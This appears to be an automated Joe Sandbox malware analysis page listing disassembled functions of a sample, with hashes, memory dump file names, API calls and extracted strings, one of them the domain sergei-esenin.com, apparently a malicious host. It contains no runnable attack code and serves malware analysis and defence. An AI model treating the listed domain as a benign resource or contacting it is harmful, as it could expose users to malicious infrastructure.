Instruction Fuzzy Hash: CD716975200700DFD724CF25E894B17B7B6FF89311F208969E99ACBB62CB71A815CB60

Function 00D099D0 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a1ecb8a8df762886f77b1c81f1f8976dcb8f702152811701e4e9b7a5b7497bc
Instruction ID: 70acd4d2a5de891668ad745f8a714514d305588400c119127acf1f58717bf257
Opcode Fuzzy Hash: 6a1ecb8a8df762886f77b1c81f1f8976dcb8f702152811701e4e9b7a5b7497bc
Instruction Fuzzy Hash: F7416D34208300ABD714DA15E8A1B2BF7E6EB85724F58882CF5CA972D2D735E811CB72

Function 00D063B8 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7f3afce850f2fa22c6b24207c114e16b360bdceb2ed071102d7c3711d234e248
Instruction ID: c1e5438beeea29399f949cf96c1be5d1bbcdef38ec51a022957d1e72d9dbb8d7
Opcode Fuzzy Hash: 7f3afce850f2fa22c6b24207c114e16b360bdceb2ed071102d7c3711d234e248
Instruction Fuzzy Hash: 7631C370649301BADA24DB04DD82F2BB7A5EB81B11F68850CF1859A2D5D770E821CB72

Function 00CD0EEC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 749eddec644d5a1e9b430020a77b77e6ef5069dd40840921b4ae7d3cb7173dfc
Instruction ID: 993b8f484924e087265fbcb4f55ed8dc229d732804cc095db0a0fdfbc52e72a9
Opcode Fuzzy Hash: 749eddec644d5a1e9b430020a77b77e6ef5069dd40840921b4ae7d3cb7173dfc
Instruction Fuzzy Hash: A9211AB490022A9FDB15CF94CC90BBEBBB1FF4A304F244859E515BB392C735A911CB64

Function 00CD2F94 Relevance: 15.9, APIs: 1, Strings: 9, Instructions: 862
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 00CD3378

Strings

sergei-esenin.com, xrefs: 00CD334C, 00CD3B12
jxEJ, xrefs: 00CD302B
3CF88EB9B82F602D9E44EE34779C9E17, xrefs: 00CD2F94
HLB6, xrefs: 00CD3855
jXl>, xrefs: 00CD3847
IK, xrefs: 00CD3178
[Pcl, xrefs: 00CD3839
AR]J, xrefs: 00CD303F
YTfT, xrefs: 00CD3832

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID: Uninitialize
String ID: 3CF88EB9B82F602D9E44EE34779C9E17$AR]J$HLB6$YTfT$[Pcl$jXl>$jxEJ$sergei-esenin.com$IK
API String ID: 3861434553-4284663585
Opcode ID: c9fd9ecf4de292e77e569d933f7405d4586155c1cbc2426a5fd6ed79dcd2a614
Instruction ID: 35bf26fb7dacdb61b367e643f09539516f510f873abfdb150e8326807dc43b99
Opcode Fuzzy Hash: c9fd9ecf4de292e77e569d933f7405d4586155c1cbc2426a5fd6ed79dcd2a614
Instruction Fuzzy Hash: 6E62ABB0500B808BD7229F35D890BA7BBF5AF1A304F44492DE5EB87752D735B619CB22

Function 00D03220 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 00D032A6

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 9f69e5ea860fdfbff11b6249baaaaa15cca6d1fa5a2b8f606fa6d57f5492ce7e
Instruction ID: 3427a75ecc938d203cea6e1ea2d43767599173b6af43b0bdb3433dc54df25216
Opcode Fuzzy Hash: 9f69e5ea860fdfbff11b6249baaaaa15cca6d1fa5a2b8f606fa6d57f5492ce7e
Instruction Fuzzy Hash: EF016D3450D340ABC701EF18E845A1EBBE8EF4A700F05881CE5C98B362D735ED60CBA6

Function 00CFF54B Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 00CFF5CD

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079177140.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079213390.0000000000D2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080120202.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080168839.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000E93000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080253667.0000000000EA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080328682.0000000000EAB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080351705.0000000000EAC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080378653.0000000000EB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080430358.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080456299.0000000000ED2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080507412.0000000000EE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080533596.0000000000EFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080549966.0000000000F00000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080596050.0000000000F01000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080618191.0000000000F06000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080641492.0000000000F0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080767484.0000000000F14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080787896.0000000000F26000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080813640.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080898348.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080916353.0000000000F31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080935215.0000000000F45000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080952171.0000000000F46000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081396343.0000000000F56000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081414188.0000000000F57000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081431250.0000000000F5A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F5C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081446574.0000000000F81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081490219.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081520517.0000000000F9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081535620.0000000000FAE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081554290.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081571951.0000000000FB8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081606421.0000000000FC7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2081623056.0000000000FC8000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_file.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: c483e4a57854b6dda21892ea6ce893854585fdfcaa9c15fe4cd82e3071a86781
Instruction ID: 19bd66f7122e6d6321e3e66998be3bf67c7f3e1647a217455fd41533cea41809
Opcode Fuzzy Hash: c483e4a57854b6dda21892ea6ce893854585fdfcaa9c15fe4cd82e3071a86781
Instruction Fuzzy Hash: 96012070108341ABE340DF14C484A2FBBF5EF86394F84980CF5C89B2A1C735D8458BA3

Function 00CFF5FC Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00CFF60F

Memory Dump Source

Source File: 00000000.00000002.2079088746.0000000000CC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.2078877374.0000000000CC0000.00000004.00000001.01000000.00000003.sdmpDownload File
